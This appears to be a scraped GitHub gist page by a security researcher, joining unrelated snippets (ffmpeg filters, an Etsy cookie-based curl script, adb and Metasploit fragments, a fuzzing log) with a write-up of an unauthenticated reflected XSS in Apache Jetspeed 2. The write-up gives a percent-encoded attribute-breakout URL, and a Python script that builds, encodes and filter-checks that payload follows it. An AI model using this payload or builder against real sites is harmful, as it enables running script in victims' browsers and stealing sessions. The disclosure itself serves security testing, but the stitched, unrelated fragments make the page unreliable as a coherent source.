Brandon Perry brandonprry
-vf zscale=t=linear:npl=100,format=gbrpf32le,tonemap=tonemap=gamma:param=1.2:desat=0:peak=15,zscale=p=709:t=709:m=709:r=full:d=error_diffusion,noise=alls=3:allf=t+u,eq=saturation=0.9:brightness=0.15:contrast=1.15:gamma=0.85,huesaturation=colors='y':saturation=-0.5:intensity=0.25,"curves=all='0.05/0 0.35/0.5 1/1'","curves=all='0/0 0.75/0.76 0.9/0.94 1/1'",deband=1thr=0.015:2thr=0.015:3thr=0.015:4thr=0.015:range=16:blur=true:coupling=true,noise=alls=2:allf=p+t,colorspace=iall=bt709:all=bt709:range=tv:format=yuv420p:dither=fsb
#export https_proxy=http://127.0.0.1:8081
USER=''
PASS=''
KEY="bd516a32ff7db81c4a991acfc5656da3" #not secret
TALENT="967951"
VERSION="48"
rm /tmp/fdsa
COOKIE='use alert(document.cookie) in the JS Console to get your current Etsy cookie. Put the entire cookie string value here.'
CONTEXT=`curl 'https://www.etsy.com/your/shops/me/dashboard?ref=hdr-mcpa' \
-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Referer: https://www.etsy.com/developers/your-apps' \
-H 'Connection: keep-alive' \
-b "$COOKIE" \
-H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-User: ?1' -H 'Priority: u=0, i' -H 'TE: trailers' | grep Etsy.Context`
Turn on debugging.
Still install sshd. File transfer over adb push/pull is too slow.
#Disable Sound
$ adb shell input keyevent 164
$ adb shell svc power stayon true
$ adb tcpip 4321 #Enable adb over wifi.
repeat
tell application "System Events" to key code (random number from 0 to 44)
delay 8
end repeat
cred_collection = ::Metasploit::Framework::CredentialCollection.new(
user_file: datastore['USER_FILE'],
username: datastore['USERNAME'],
blank_passwords: true
)
apt-get install xvfb && (Xvfb :1 -screen 0 640x480x8 &) && sleep 1 && export DISPLAY=:1.0 && xcalc  # Xvfb is backgrounded in a subshell; run in the foreground it never returns, so the chain would never reach xcalc
bperry@ubuntu:~/tmp$ DYNINSTAPI_RT_LIB=./dyninst-9.2.0/build/dyninstAPI_RT/libdyninstAPI_RT.so LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH ./afl-dyninst -i fisimple -o fi_inst -l libsc_fi.so -d
Skipping library: libAflDyninst.so
Skipping library: crtstuff.c
Skipping library: libAflDyninst.cpp
Instrumenting module: fisimple
Instrumenting module: crtstuff.c
Skipping library: DEFAULT_MODULE
Instrumenting module: libsc_fi.so
Segmentation fault
bperry@ubuntu:~/tmp$
for( j = 0; j < n->classname_len && j<9; j++)
kv[j] = b[j*2];
kv[8] = 0;
sscanf( kv, "%x", (unsigned int*)( &key[i*4] ) );
brandonprry / gist:1fec884bc1253e972e77
Last active January 15, 2016 20:59
Apache Jetspeed 2 Unauthenticated Reflected XSS

During a recent pentest, we came across an Apache Jetspeed 2 instance. After a few hours of testing, I realised that the web application was vulnerable to an unauthenticated reflected XSS attack. I was limited, though: I could not use < or > anywhere in the URL, because Jetspeed returned a 400 Bad Request for any request containing them.

The URL was reflected inside a double-quoted attribute and a double quote (") was not encoded, so I could break out of that attribute and add attributes of my own to the element. A crafted URL could add a style attribute that makes that element a fixed block covering the entire page, followed by an onmouseover attribute that runs arbitrary JavaScript as soon as the mouse moves; no < or > is needed for either. I ended up with a generic URL that looked like this (URL encoded):

http://192.168.0.7:8080/jetspeed/portal/fdsa%22%20%73%74%79%6c%65%3d%22%70%61%64%64%69%6e%67%2d%74%6f%70%3a%35%30%30%30%70%78%3b%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%70%6f%73%69%74%69%6f%6e%3a%66%69%78%65%64%3b%74%6f%70%3a%30%3b%6c%65%66%74%3a%30%3b%22%20%6f%6e%6d%6f%75%73%65%6f%76%65%72%3d%22%6a%61
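The attribute-breakout payload described above, as an added example that is not part of the gist: it builds the decoded payload (closing quote, full-page style, onmouseover handler), checks that it contains no < or > (which the write-up says the server rejects with a 400), percent-encodes everything after the literal prefix the way the gist's URL does, and decodes the encoded fragment from the page so it can be read. The base URL and `fdsa` prefix are the page's own; the `alert(document.domain)` handler is an assumption, since the page's handler is cut off after `ja`.

```python
"""Attribute-breakout reflected XSS payload builder (added example, not gist code).

Assumes the reflected value lands inside a double-quoted attribute and that the
server rejects raw < or > with 400, as the write-up reports. The handler string
is illustrative; the page's own handler is truncated.
"""
from urllib.parse import unquote

# Style from the decoded gist URL: the element becomes a fixed, full-page block
# so that any mouse movement fires the handler.
FULL_PAGE_STYLE = "padding-top:5000px;display:block;position:fixed;top:0;left:0;"

# Encoded attribute part of the URL exactly as it appears (truncated) on the page.
PAGE_ENCODED_SUFFIX = (
    "%22%20%73%74%79%6c%65%3d%22%70%61%64%64%69%6e%67%2d%74%6f%70%3a%35%30%30%30%70%78%3b"
    "%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%70%6f%73%69%74%69%6f%6e%3a%66%69%78%65%64"
    "%3b%74%6f%70%3a%30%3b%6c%65%66%74%3a%30%3b%22%20%6f%6e%6d%6f%75%73%65%6f%76%65%72%3d"
    "%22%6a%61"
)


def has_angle_brackets(s: str) -> bool:
    """True if the decoded payload would trip the server's < / > filter."""
    return "<" in s or ">" in s


def build_attribute_breakout(prefix: str, style: str, handler: str) -> str:
    """Decoded payload: close the attribute that holds the URL with a quote, then
    append a style attribute and an onmouseover handler. The closing quote of
    the original attribute ends the injected handler value, so none is added."""
    return f'{prefix}" style="{style}" onmouseover="{handler}'


def percent_encode_all(s: str) -> str:
    """Percent-encode every byte as lowercase hex, as the gist's URL does."""
    return "".join(f"%{b:02x}" for b in s.encode("utf-8"))


def decode_payload(encoded: str) -> str:
    """Reverse of percent_encode_all; handy for reading a captured URL."""
    return unquote(encoded)


def build_url(base: str, prefix: str, style: str, handler: str) -> str:
    """Assemble the full URL: the harmless prefix stays literal, everything after
    it is percent-encoded. Raises if the payload would be rejected outright."""
    payload = build_attribute_breakout(prefix, style, handler)
    if has_angle_brackets(payload):
        raise ValueError("payload contains < or >, which the target rejects with 400")
    return base + prefix + percent_encode_all(payload[len(prefix):])


if __name__ == "__main__":
    # Handler is a hypothetical placeholder chosen to keep the example self-contained.
    url = build_url("http://192.168.0.7:8080/jetspeed/portal/", "fdsa",
                    FULL_PAGE_STYLE, "alert(document.domain)")
    print(url)
    print(decode_payload(PAGE_ENCODED_SUFFIX))
```

Decoding the page's fragment gives `fdsa" style="padding-top:5000px;display:block;position:fixed;top:0;left:0;" onmouseover="ja`, which is exactly what the builder produces for the same inputs; the only characters that matter for the breakout are the quote, the space and the `=`, all of which survive the server's filter.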